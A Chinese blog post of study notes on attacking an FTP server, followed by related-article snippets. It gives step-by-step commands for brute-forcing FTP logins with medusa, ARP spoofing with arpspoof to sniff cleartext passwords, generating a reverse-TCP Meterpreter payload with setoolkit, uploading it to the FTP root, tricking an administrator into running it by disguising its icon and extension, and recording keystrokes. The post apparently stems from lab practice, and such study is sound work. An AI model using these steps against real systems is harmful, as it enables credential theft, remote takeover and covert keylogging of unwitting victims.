记录今日学习--FTP嗅探与简易制作Payload

最新推荐文章于 2024-06-28 09:31:42 发布
最新推荐文章于 2024-06-28 09:31:42 发布
阅读量319 收藏 2
点赞数
文章标签: ftp 嗅探 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44515089/article/details/104520306
版权

FTP暴力破解密码

首先建立账户,使用 net user username password /add 建立用户
然后 net localgroup administrators username /add 将用户加入管理员组
在FTP站点中加入新建立的用户,允许其远程登陆—服务器准备工作配置完毕

在kali中下载medusa // 使用 sudo apt-get install medusa 安装
在这里插入图片描述
安装后 需要准备一个密码文件 如pass.txt 将正确的密码放入其中(或者字典)
使用命令 medusa -h IP -u username -P pass.txt -M ftp
后面这个ftp是模块的意思 可使用medusa -d 查看模块

FTP明文用户名、密码嗅探

FTP明文用户名、密码嗅探:
在用户名与密码传输的过程中,可以使用wireshark进行嗅探(也可以添加ftp作为过滤)
在此之前 利用arpspoof 进行arp欺骗
arpspoof -i eth0 192.168.1.1 -t 192.168.1.105 -i eth0 指的是网卡 要欺骗的目标是1.105 欺骗的1.105,让报文发送到kali而不是网关1.1

FTP登陆之后可以做的事情

可以利用 matasploit 创建反弹shell上传到FTP服务器。
可以利用setoolkit快速生成反弹shell,当管理员点击shell之后,后端就可以弹出cmd窗口

  1. 首先,输入setoolkit
  2. 选择Social-Engineering Attacks
  3. 选择Create a Payload and listen
  4. 选择Windows Reverse_TCP Meterpreter
  5. 输入Listener的IP(谁监听):(可以用ifconfig查看)
  6. 输入监听的端口:(不要选择常用端口,可以利用netstat -pantu 查看目前的端口被占用情况)
  7. 然后就会自动生成payload(在/root/.set/payload.exe),开始监听
  8. 移动payload 到桌面 mv /root/.set/payload.exe /root/Desktop
  9. 利用win下面的FlashFXP工具/命令行工具将文件上传到c:/inetpub/ftproot下面(自己做实验可以复制过去)
  10. 诱惑管理员点击payload 可以修改图标、重命名、隐藏后缀等
  11. kali出现对应连接
  12. 输入sessions -l进行查看
  13. 输入sessions -i 数字 选择对应的数字选择session
  14. 就可以开始执行命令了,也可以进行键盘记录(keyscan_start) 对应通过keyscan_dump 查看键盘记录
爻庚
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sniffpass网络密码嗅探(WebFTPEmail)工具
07-27
sniffpass网络密码嗅探(WebFTPEmail)工具,可以用于局域网嗅探密码,可以嗅到ftp、web、email等的登录口令
网络嗅探与防范实验
TimDyh的博客
07-19 941
实验工具与环境配置 服务器操作系统:macOS Catalina 10.15.2 客户端操作系统:macOS High Sierra 10.13.6 FTP 服务器:QuickFTP Server 1.0.4 FTP 客户端:ForkLift 2.6.6 浏览器:Chrome 83.0.4103.61 Sniffer 工具:Wireshark 3.2.3 邮箱登录嗅探 我们知道,现在绝大多数网页访问都是基于安全的 HTTPS 协议,本实验选择的 QQ 邮箱也不例外。不同于 HTTP 协议,HTTPS 使
python => 处理字符串,制作payload
嗯哼~~~
09-08 158
遇到过这样的情形,测试认证漏洞的时候,需要特别制作payload,仅是试验用的数据就有100个,如果要制作一个payload集每个密码之间都间隔一个正确密码,就得粘贴100次。这还是最简单的payload。如果需要的payload是json格式呢?有个现成的payload密码集100个,现在需要在每个密码前插入一个已知账号的正确密码,最后也是200行。例如,用户名payload为,一个已知账号 + 一个待测试账号,重复100遍,一共200行。如果要求payload是这样的。只能写个脚本了,如下是例子。
创建FTP站点 使用PE文件管理器共享文件
笑一个吧
07-04 1610
Ftp协议 FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。 默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数
metasploit-学习9--显示payload的模块的所有payload信息
简单就是美
06-19 4550
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    ----------- aix/ppc/shell_bind_
theme-sniffer:使用嗅探的主题嗅探器插件
02-05
主题嗅探器 描述 Theme Sniffer是一个利用自定义嗅探的插件,可以静态分析您的主题并确保其遵循WordPress编码约定,并检查您的代码是否与PHP版本兼容。 要求 主题嗅探器要求: PHP 7.0或更高版本。 WordPress 4.7...
Python-Python程序用于嗅探未加密的探测请求并将其记录到MySQL
08-10
在这个特定的场景中,Python被用来创建一个程序,目的是嗅探网络上的未加密探测请求,并将这些数据存储到MySQL数据库中,这涉及到网络安全和日志记录的重要方面。 首先,我们要理解“嗅探”在网络中的含义。嗅探...
Go-zk-sniffer使用golang嗅探和解析ZooKeeper数据包
08-14
Go-zk-sniffer就是这样一款基于Golang开发的工具,专门用于嗅探和解析ZooKeeper的数据包,为开发者提供了一种深入洞察ZooKeeper网络通信的途径。 首先,我们来了解下ZooKeeper的主要功能。ZooKeeper是一个分布式的...
信息安全-网络扫描与嗅探实验报告.doc
06-24
信息安全-网络扫描与嗅探实验报告 本实验报告主要介绍了网络嗅探和扫描技术的应用,通过使用 Wireshark 和 Superscan 软件,掌握了网络嗅探和扫描的工作机制和作用。实验中,我们学习了如何使用 Wireshark 进行网络...
torsniff:torsniff-从BitTorrent网络嗅探种子的嗅探
04-27
torsniff-从BitTorrent网络嗅探种子的嗅探器English |介绍torsniff是一个洪流嗅探器,它嗅探人们用来从BitTorrent网络下载电影,音乐,文档,游戏等的洪流。 torrent具有有价值的信息,因此您可以使用torniff来构建...
Payload笔记
菜浪马废的博客
09-13 2199
一.payload生成 msf: –p (- -payload-options) 添加载荷payload。 –l 查看所有payload encoder nops。 –f (- -help-formats) 输出文件格式。 –e 编码免杀。 –a (- -platform – -help-platforms) 选择架构平台 x86 | x64 | x86_64 –o 文件输出。 –s 生成payload的最大长度,就是文件大小。 –b 避免使用的字符 例如:不使用 ‘\0f’。 –i 编码次数。 –c 添
嗅探FTPS标准工作模式
weixin_43444233的博客
01-28 411
我们知道,FTP服务是Internet上重要的、用途最广泛的服务之一。FTP是文件传输协议的简称。它支持两种工作模式,这两种模式分别是标准模式和被动模式。标准模式又叫PORT模式或主动模式,是目前大多数FTP客户端软件的默认数据传输方式。那么,FTP的标准模式是如何工作的呢?通过对捕获数据包的分析以及具体的FTP应用实战,我们可以对FTP的标准模式有一个较为完整的认识。(关于PASV模式的工作原理...
抓取FTP用户名及密码(kali与win7虚拟机双实验)
Sam5ara的博客
06-30 968
查看目标机(该靶机非搭建ftp的win7-1,需要使用另一台虚拟机win7-2)先打开wireshark进行抓包。打开浏览器进行访问ftp服务。wireshark进行抓包。选择eth0网卡进行抓包。win7进行ftp访问。
payload的使 常用xss_编写自己的xss payload
weixin_39942488的博客
12-20 151
[AppleScript] 纯文本查看 复制代码var request=false;if(window.XMLHttpRequest){request=new XMLHttpRequest();if(request.overrideMimeType){request.overrideMimeType('text/xml');}}else if(window.ActiveXObject){var v...
web渗透--ftp暴力破解,明文、嗅探安全等
guoyuxin3的博客
05-13 1310
一、 FTP用户名密码暴力破解 1、知道用户名和密码nc直接相连 2、知道用户名不知道密码 1、medusa工具 medusa -d 可以查看可以破解模块都有什么 medusa -h IP地址 -u 用户名 -P 字典 ftp 二、FTP用户名明文密码验证 1、FTP协议中用户认证的过程,客户端和用户端都是采用的明文进行交互信息。验证FTP登录过程中明文传输用户名和密码。 2、用wireshark...
手把手简单制作一个 Java 木马程序
xmt1139057136的专栏
08-01 6911
你知道的越多,不知道的就越多,业余的像一棵小草!你来,我们一起精进!你不来,我和你的竞争对手一起精进!编辑:业余草juejin.cn/post/6990715558178062372推荐:...
Scapy嗅探FTP用户密码
zwlww1的博客
01-23 1538
#!/usr/bin/python #coding=utf-8 import optparse from scapy.all import * def ftpSniff(pkt): dest = pkt.getlayer(IP).dst raw = pkt.sprintf('%Raw.load%') user = re.findall('(?i)USER (.*)', r
使用Sniffer嗅探FTP数据包
stilling2006的专栏
03-06 3648
     本来是计划用C++写出一个能够分析TCP/UDP/FTP的类似sniffer的小窗体程序的。但Google了一整天坎坎坷坷的写出了小程序,但始终无法提炼出FTP的信息。而老师的作业又迫在眉睫,加之周末可能得干其他事,索性还是下了sniffer4.6回来,操家伙开始嗅探了。     sniffer给我的感觉就是那种刚拿到很吓人,N多的仪器界面,N多的菜单。捣鼓了一天后,发现是那种上
Linux杂货铺】Linux学习之路:期末总结篇1
最新发布
聆风吟的博客
06-28 1237
本文主要讲了作者本人期末复习时的总结,欢迎大家借鉴浏览。
实验1数据嗅探实验.docx
05-12
综上所述,本网络嗅探实验通过对FTP明文密码的抓取、TCP三次握手的实现以及ping扫描实验的具体操作和数据包抓取分析,为学习者提供了丰富的实践机会和学习资源,帮助他们更加深入地了解网络嗅探和数据包分析的相关...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值